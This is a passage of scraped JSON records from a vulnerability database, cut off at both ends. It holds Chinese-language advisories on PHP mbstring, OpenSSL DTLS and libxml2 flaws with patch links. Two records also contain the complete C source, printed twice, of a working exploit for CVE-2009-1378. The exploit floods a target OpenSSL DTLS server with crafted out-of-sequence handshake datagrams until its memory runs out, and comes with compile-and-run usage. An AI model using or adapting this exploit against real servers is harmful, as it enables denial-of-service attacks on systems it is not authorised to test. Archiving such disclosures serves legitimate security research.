"CVE-2009-1378"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-05-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11378", "id": "SSV:11378", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T19:04:40", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 32948\r\nCVE ID\uff1aCVE-2008-5557\r\n\r\nPHP\u662f\u4e00\u6b3e\u7f51\u7edc\u7f16\u7a0b\u8bed\u8a00\u3002\r\nPHP mbstring\u6269\u5c55\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u9519\u8bef\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u3002\r\nmbstring\u6269\u5c55\u7528\u4e8e\u5904\u7406\u591a\u5b57\u8282unicode\u5b57\u7b26\u4e32\uff0c\u5728\u89e3\u7801\u90e8\u5206HTML\u5b9e\u4f53\u4e3aunicode\u5b57\u7b26\u4e32\u65f6\u5b58\u5728\u95ee\u9898\uff0c\u7531\u4e8e\u89e3\u7801\u5668\u4e0d\u6b63\u786e\u5904\u7406\u9519\u8bef\u6761\u4ef6\uff0c\u5806\u5206\u914d\u7f13\u51b2\u533a\u7684\u8fb9\u754c\u68c0\u67e5\u53ef\u88ab\u6709\u6548\u7684\u7ed5\u8fc7\u3002\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u53ef\u4f20\u9001\u4efb\u610f\u6570\u636e\u5230\u5806\u7279\u5b9a\u57df\u800c\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nPHP PHP 5.2.6 \r\nPHP PHP 5.2.5 \r\nPHP PHP 5.2.4 \r\nPHP PHP 5.2.3 \r\nPHP PHP 5.2.2 \r\nPHP PHP 5.2.1 \r\n+ Ubuntu Ubuntu Linux 7.04 sparc\r\n+ Ubuntu Ubuntu Linux 7.04 powerpc\r\n+ Ubuntu Ubuntu Linux 7.04 i386\r\n+ Ubuntu Ubuntu Linux 7.04 amd64\r\nPHP PHP 5.1.6 \r\n+ Ubuntu Ubuntu Linux 6.10 sparc\r\n+ Ubuntu Ubuntu Linux 6.10 powerpc\r\n+ Ubuntu Ubuntu Linux 6.10 i386\r\n+ Ubuntu Ubuntu Linux 6.10 amd64\r\nPHP PHP 5.1.5 \r\nPHP PHP 5.1.4 \r\nPHP PHP 5.1.3 \r\nPHP PHP 5.1.3 \r\nPHP PHP 5.1.2 \r\n+ Ubuntu Ubuntu Linux 6.06 LTS sparc\r\n+ Ubuntu Ubuntu Linux 6.06 LTS powerpc\r\n+ Ubuntu Ubuntu Linux 6.06 LTS i386\r\n+ Ubuntu Ubuntu Linux 6.06 LTS amd64\r\nPHP PHP 5.1.1 \r\nPHP PHP 5.1 \r\nPHP PHP 5.0.5 \r\nPHP PHP 5.0.4 \r\nPHP PHP 5.0.3 \r\n+ Trustix Secure Linux 2.2 \r\nPHP PHP 5.0.2 \r\nPHP PHP 5.0.1 \r\nPHP PHP 5.0 candidate 3\r\nPHP PHP 5.0 candidate 2\r\nPHP PHP 5.0 candidate 1\r\nPHP PHP 5.0 .0\r\nPHP PHP 4.4.9 \r\nPHP PHP 4.4.8 \r\nPHP PHP 4.4.7 \r\n- Slackware Linux 10.2 \r\n- Slackware Linux 11.0\r\n- Slackware Linux -current\r\nPHP PHP 4.4.6 \r\nPHP PHP 4.4.5 \r\nPHP PHP 4.4.4 \r\nPHP PHP 4.4.3 \r\nPHP PHP 4.4.2 \r\nPHP PHP 4.4.1 \r\nPHP PHP 4.4 .0\r\nPHP PHP 4.3.11 \r\nPHP PHP 4.3.10 \r\n+ Gentoo Linux \r\n+ RedHat Fedora Core3\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\n+ Trustix Secure Linux 1.5 \r\nPHP PHP 4.3.9 \r\nPHP PHP 4.3.8 \r\n+ MandrakeSoft Linux Mandrake 10.1 x86_64\r\n+ MandrakeSoft Linux Mandrake 10.1 \r\n+ S.u.S.E. Linux Personal 9.2 \r\n+ Turbolinux Turbolinux Server 10.0 \r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nPHP PHP 4.3.7 \r\nPHP PHP 4.3.6 \r\nPHP PHP 4.3.5 \r\nPHP PHP 4.3.4 \r\n+ MandrakeSoft Corporate Server 3.0 x86_64\r\n+ MandrakeSoft Corporate Server 3.0 \r\n+ MandrakeSoft Linux Mandrake 10.0 AMD64\r\n+ MandrakeSoft Linux Mandrake 10.0 \r\n+ S.u.S.E. Linux Personal 9.1 \r\nPHP PHP 4.3.3 \r\n+ S.u.S.E. Linux Personal 9.0 x86_64\r\n+ S.u.S.E. Linux Personal 9.0 \r\n+ Turbolinux Home \r\n+ Turbolinux Turbolinux 10 F...\r\n+ Turbolinux Turbolinux Desktop 10.0 \r\nPHP PHP 4.3.2 \r\nPHP PHP 4.3.1 \r\n+ MandrakeSoft Linux Mandrake 9.1 ppc\r\n+ MandrakeSoft Linux Mandrake 9.1 \r\n+ OpenPKG OpenPKG Current\r\n+ S.u.S.E. Linux Personal 8.2 \r\nPHP PHP 4.3 \r\nPHP PHP 5.2\r\n+ Debian Linux 4.0 sparc\r\n+ Debian Linux 4.0 s/390\r\n+ Debian Linux 4.0 powerpc\r\n+ Debian Linux 4.0 mipsel\r\n+ Debian Linux 4.0 mips\r\n+ Debian Linux 4.0 m68k\r\n+ Debian Linux 4.0 ia-64\r\n+ Debian Linux 4.0 ia-32\r\n+ Debian Linux 4.0 hppa\r\n+ Debian Linux 4.0 arm\r\n+ Debian Linux 4.0 amd64\r\n+ Debian Linux 4.0 alpha\r\n+ Debian Linux 4.0\n \u5347\u7ea7\u5230PHP 5.2.8\u7248\u672c\uff1a\r\n<a href=http://www.php.net/ target=_blank>http://www.php.net/</a>", "reporter": "Root", "published": "2008-12-24T00:00:00", "type": "seebug", "title": "PHP 'mbstring\u6269\u5c55\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5557"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2008-12-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4590", "id": "SSV:4590", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "details"}, {"lastseen": "2017-11-19T18:48:18", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 35174\r\nCVE(CAN) ID: CVE-2009-1386\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u5982\u679c\u5728ClientHello\u62a5\u6587\u4e4b\u524d\u53d1\u9001\u4e86DTLS ChangeCipherSpec\u62a5\u6587\uff0c\u5c31\u53ef\u80fd\u5728OpenSSL\u7684ssl/s3_pkt.c\u6587\u4ef6\u4e2d\u89e6\u53d1\u7a7a\u6307\u9488\u5f15\u7528\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u7684\u60c5\u51b5\u3002\r\n\n\nOpenSSL 0.9.8i\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpenSSL Project\r\n---------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://cvs.openssl.org/chngview?cn=17369\" target=\"_blank\" rel=external nofollow>http://cvs.openssl.org/chngview?cn=17369</a>", "reporter": "Root", "published": "2009-06-06T00:00:00", "type": "seebug", "title": "OpenSSL ChangeCipherSpec DTLS\u62a5\u6587\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1386"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-06-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11541", "id": "SSV:11541", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:46:27", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 35417\r\nCVE(CAN) ID: CVE-2009-1387\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\nOpenSSL\u5728\u63a5\u6536\u5230\u5e26\u6709\u975e\u9884\u671f\u5e8f\u5217\u53f7\u7684\u63e1\u624b\u6d88\u606f\u65f6\u4f1a\u5c06\u5176\u4f20\u9001\u7ed9dtls1_process_out_of_seq_message()\u51fd\u6570\u3002\u5982\u679c\u5e8f\u5217\u53f7\u4f4e\u4e8e\u9884\u671f\u503c\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u4e22\u5f03\u6570\u636e\uff1b\u5982\u679c\u4e3a\u4e4b\u540e\u7684\u6d88\u606f\uff0c\u51fd\u6570\u4f1a\u7f13\u51b2\u6570\u636e\u3002\u5728\u4e22\u5f03\u6570\u636e\u65f6\uff0c\u6d88\u606f\u788e\u7247\u957f\u5ea6\u4fdd\u6301\u4e3a0\uff0c\u8bf4\u660e\u6ca1\u6709\u7f13\u51b2\u4efb\u4f55\u6570\u636e\u3002\u7531\u4e8e\u68c0\u67e5\u957f\u5ea6\u6240\u7528\u7684\u9519\u8befif\u6761\u4ef6\uff0c\u6709\u65f6\u4f1a\u7f13\u51b2\u6ca1\u6709\u6570\u636e\u4f46\u957f\u5ea6\u4e3a\u4e22\u5f03\u6d88\u606f\u957f\u5ea6\u7684\u788e\u7247\uff0c\u4e4b\u540e\u5728\u8fdb\u884c\u5904\u7406\u7684\u65f6\u5019\u4f1a\u5bfc\u81f4\u603b\u7ebf\u9519\u8bef\u3002\n\nOpenSSL 0.9.x\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpenSSL Project\r\n---------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://cvs.openssl.org/chngview?cn=17958\" target=\"_blank\" rel=external nofollow>http://cvs.openssl.org/chngview?cn=17958</a>", "reporter": "Root", "published": "2009-06-22T00:00:00", "type": "seebug", "title": "OpenSSL dtls1_retrieve_buffered_fragment()\u51fd\u6570\u63e1\u624b\u6d88\u606f\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1387"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-06-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11667", "id": "SSV:11667", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T17:11:15", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1378"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66544", "id": "SSV:66544", "sourceData": "\n /*\r\n * cve-2009-1378.c\r\n *\r\n * OpenSSL &#60;= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS\r\n * Jon Oberheide &#60;jon@oberheide.org&#62;\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\r\n *\r\n * In dtls1_process_out_of_seq_message() the check if the current message is \r\n * already buffered was missing. For every new message was memory allocated, \r\n * allowing an attacker to perform an denial of service attack with sending \r\n * out of seq handshake messages until there is no memory left.\r\n *\r\n * Usage:\r\n *\r\n * Pass the host and port of the target DTLS server:\r\n *\r\n * $ gcc cve-2009-1378.c -o cve-2009-1378\r\n * $ ./cve-2009-1378 1.2.3.4 666\r\n *\r\n * Notes:\r\n *\r\n * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP\r\n * datagram. If you have a bigger MTU than 1500, feel free to set it.\r\n *\r\n * Complete memory exhaustion may take a while depending on the throughput \r\n * to the target and the amount of memory it has. By default, we&#39;ll just \r\n * continue sending datagrams indefinitely.\r\n *\r\n */\r\n\r\n#include &#60;stdio.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;errno.h&#62;\r\n#include &#60;netdb.h&#62;\r\n#include &#60;netinet/in.h&#62;\r\n#include &#60;sys/types.h&#62;\r\n#include &#60;sys/stat.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n\r\n#define MTU 1500\r\n\r\n#define IP_HDR_LEN 20\r\n#define UDP_HDR_LEN 8\r\n#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN)\r\n\r\n#define put16(b, data) ( \\\r\n (*(b) = ((data) &#62;&#62; 8) & 0xff), \\\r\n (*((b)+1) = (data) & 0xff))\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint sock, ret;\r\n\tchar *ptr, *err;\r\n\tstruct hostent *h;\r\n\tstruct sockaddr_in target;\r\n\tchar buf[MAX_LEN];\r\n\r\n\tif (argc &#60; 3) {\r\n\t\terr = &#34;Pass the host and port of the target DTLS server&#34;;\r\n\t\tprintf(&#34;[-] Error: %s\\n&#34;, err);\r\n\t\texit(1);\r\n\t}\r\n\r\n\th = gethostbyname(argv[1]);\r\n\tif (!h) {\r\n\t\terr = &#34;Unknown host specified&#34;;\r\n\t\tprintf(&#34;[-] Error: %s (%s)\\n&#34;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\ttarget.sin_family = h-&#62;h_addrtype;\r\n\tmemcpy(&target.sin_addr.s_addr, h-&#62;h_addr_list[0], h-&#62;h_length);\r\n\ttarget.sin_port = htons(atoi(argv[2]));\r\n\r\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\r\n\tif (sock == -1) {\r\n\t\terr = &#34;Failed creating UDP socket&#34;;\r\n\t\tprintf(&#34;[-] Error: %s (%s)\\n&#34;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = connect(sock, (struct sockaddr *) &target, sizeof(target));\r\n\tif (ret == -1) {\r\n\t\terr = &#34;Failed to connect socket&#34;;\r\n\t\tprintf(&#34;[-] Error: %s (%s)\\n&#34;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tptr = buf;\r\n\r\n\t/* header */\r\n\tmemcpy(ptr, &#34;\\x16\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&#34;, 11);\r\n\tptr += 11;\r\n\r\n\t/* packet length */\r\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\r\n\tptr += 2;\r\n\t\r\n\t/* client hello */\r\n\tmemcpy(ptr, &#34;\\x01&#34;, 1);\r\n\tptr += 1;\r\n\t\r\n\t/* length */\r\n\tmemcpy(ptr, &#34;\\x00&#34;, 1);\r\n\tptr += 1;\r\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8));\r\n\tptr += 2;\r\n\r\n\t/* sequence number */\r\n\tmemcpy(ptr, &#34;\\x00\\x01&#34;, 2);\r\n\tptr += 2;\r\n\r\n\t/* frag offset */\r\n\tmemcpy(ptr, &#34;\\x00\\x00\\x00&#34;, 3);\r\n\tptr += 3;\r\n\r\n\t/* length */\r\n\tmemcpy(ptr, &#34;\\x00&#34;, 1);\r\n\tptr += 1;\r\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\r\n\tptr += 2;\r\n\r\n\t/* payload */\r\n\tmemset(ptr, &#39;\\x00&#39;, MAX_LEN - (ptr - buf));\r\n\r\n\tprintf(&#34;[+] Firing loads of packets at %s:%s...\\n&#34;, argv[1], argv[2]);\r\n\r\n\twhile (1) {\r\n\t\tsend(sock, buf, MAX_LEN, 0);\r\n\t}\r\n\r\n\tclose(sock);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-05-18]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66544", "status": "cve,poc"}, {"lastseen": "2017-11-19T18:56:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2009-05-18T00:00:00", "title": "OpenSSL &lt;= 0.9.8k\t 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1378"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-05-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17956", "id": "SSV:17956", "sourceData": "\n /*\n * cve-2009-1378.c\n *\n * OpenSSL &lt;= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS\n * Jon Oberheide &lt;jon@oberheide.org&gt;\n * http://jon.oberheide.org\n *\n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n *\n * In dtls1_process_out_of_seq_message() the check if the current message is \n * already buffered was missing. For every new message was memory allocated, \n * allowing an attacker to perform an denial of service attack with sending \n * out of seq handshake messages until there is no memory left.\n *\n * Usage:\n *\n * Pass the host and port of the target DTLS server:\n *\n * $ gcc cve-2009-1378.c -o cve-2009-1378\n * $ ./cve-2009-1378 1.2.3.4 666\n *\n * Notes:\n *\n * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP\n * datagram. If you have a bigger MTU than 1500, feel free to set it.\n *\n * Complete memory exhaustion may take a while depending on the throughput \n * to the target and the amount of memory it has. By default, we'll just \n * continue sending datagrams indefinitely.\n *\n */\n\n#include &lt;stdio.h&gt;\n#include &lt;string.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\n#include &lt;errno.h&gt;\n#include &lt;netdb.h&gt;\n#include &lt;netinet/in.h&gt;\n#include &lt;sys/types.h&gt;\n#include &lt;sys/stat.h&gt;\n#include &lt;sys/socket.h&gt;\n\n#define MTU 1500\n\n#define IP_HDR_LEN 20\n#define UDP_HDR_LEN 8\n#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN)\n\n#define put16(b, data) ( \\\n (*(b) = ((data) &gt;&gt; 8) &amp; 0xff), \\\n (*((b)+1) = (data) &amp; 0xff))\n\nint\nmain(int argc, char **argv)\n{\n\tint sock, ret;\n\tchar *ptr, *err;\n\tstruct hostent *h;\n\tstruct sockaddr_in target;\n\tchar buf[MAX_LEN];\n\n\tif (argc &lt; 3) {\n\t\terr = &quot;Pass the host and port of the target DTLS server&quot;;\n\t\tprintf(&quot;[-] Error: %s\\n&quot;, err);\n\t\texit(1);\n\t}\n\n\th = gethostbyname(argv[1]);\n\tif (!h) {\n\t\terr = &quot;Unknown host specified&quot;;\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\n\t\texit(1);\n\t}\n\n\ttarget.sin_family = h-&gt;h_addrtype;\n\tmemcpy(&amp;target.sin_addr.s_addr, h-&gt;h_addr_list[0], h-&gt;h_length);\n\ttarget.sin_port = htons(atoi(argv[2]));\n\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sock == -1) {\n\t\terr = &quot;Failed creating UDP socket&quot;;\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tret = connect(sock, (struct sockaddr *) &amp;target, sizeof(target));\n\tif (ret == -1) {\n\t\terr = &quot;Failed to connect socket&quot;;\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tptr = buf;\n\n\t/* header */\n\tmemcpy(ptr, &quot;\\x16\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;, 11);\n\tptr += 11;\n\n\t/* packet length */\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\n\tptr += 2;\n\t\n\t/* client hello */\n\tmemcpy(ptr, &quot;\\x01&quot;, 1);\n\tptr += 1;\n\t\n\t/* length */\n\tmemcpy(ptr, &quot;\\x00&quot;, 1);\n\tptr += 1;\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8));\n\tptr += 2;\n\n\t/* sequence number */\n\tmemcpy(ptr, &quot;\\x00\\x01&quot;, 2);\n\tptr += 2;\n\n\t/* frag offset */\n\tmemcpy(ptr, &quot;\\x00\\x00\\x00&quot;, 3);\n\tptr += 3;\n\n\t/* length */\n\tmemcpy(ptr, &quot;\\x00&quot;, 1);\n\tptr += 1;\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\n\tptr += 2;\n\n\t/* payload */\n\tmemset(ptr, '\\x00', MAX_LEN - (ptr - buf));\n\n\tprintf(&quot;[+] Firing loads of packets at %s:%s...\\n&quot;, argv[1], argv[2]);\n\n\twhile (1) {\n\t\tsend(sock, buf, MAX_LEN, 0);\n\t}\n\n\tclose(sock);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-05-18]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17956", "status": "poc"}, {"lastseen": "2017-11-19T21:20:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 32326\r\nCVE(CAN) ID: CVE-2008-4226\r\n\r\nlibxml\u8f6f\u4ef6\u5305\u63d0\u4f9b\u5141\u8bb8\u7528\u6237\u64cd\u63a7XML\u6587\u4ef6\u7684\u51fd\u6570\u5e93\uff0c\u5305\u542b\u6709\u8bfb\u3001\u4fee\u6539\u548c\u5199XML\u548cHTML\u6587\u4ef6\u652f\u6301\u3002\r\n\r\nlibxml2\u5e93\u7684xmlSAX2Characters()\u51fd\u6570\u4e2d\u5b58\u5728\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5982\u679c\u7528\u6237\u53d7\u9a97\u4f7f\u7528\u94fe\u63a5\u5230\u8be5\u5e93\u7684\u5e94\u7528\u7a0b\u5e8f\u6253\u5f00\u4e86\u8d85\u5927\u7684XML\u6587\u4ef6\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nXMLSoft Libxml2 2.7.2\n Debian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1666-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1666-1\uff1aNew libxml2 packages fix several vulnerabilities\r\n\u94fe\u63a5\uff1a<a href=http://www.debian.org/security/2008/dsa-1666 target=_blank>http://www.debian.org/security/2008/dsa-1666</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6.dsc target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6.dsc</a>\r\nSize/MD5 checksum: 893 b6b2006ffadfb999e72974d574814b7c\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz</a>\r\nSize/MD5 checksum: 3416175 5ff71b22f6253a6dd9afc1c34778dec3\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6.diff.gz target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6.diff.gz</a>\r\nSize/MD5 checksum: 147867 d6a3bbbe39bffe96867de82b11c7c5be\r\n\r\nArchitecture independent packages:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-6_all.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-6_all.deb</a>\r\nSize/MD5 checksum: 1328280 c2990030601040775b909c8ace076100\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_alpha.deb</a>\r\nSize/MD5 checksum: 881946 38629543e71a18f6007b8d61d0500e36\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_alpha.deb</a>\r\nSize/MD5 checksum: 821150 f14ee677bb7eac20cd65adef90af0f3c\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_alpha.deb</a>\r\nSize/MD5 checksum: 37972 d7757b07f8b0c69f9fd0a07a1598a3e3\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_alpha.deb</a>\r\nSize/MD5 checksum: 184750 020e5ca7663ee88695e1502c8e8af77c\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_alpha.deb</a>\r\nSize/MD5 checksum: 917020 f837c687d428d94559bf68e012bc0e02\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_amd64.deb</a>\r\nSize/MD5 checksum: 745790 94edf60cc7d02dd31a70376baf740958\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_amd64.deb</a>\r\nSize/MD5 checksum: 892010 a648a6d69a73593739035d78ed3c8436\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_amd64.deb 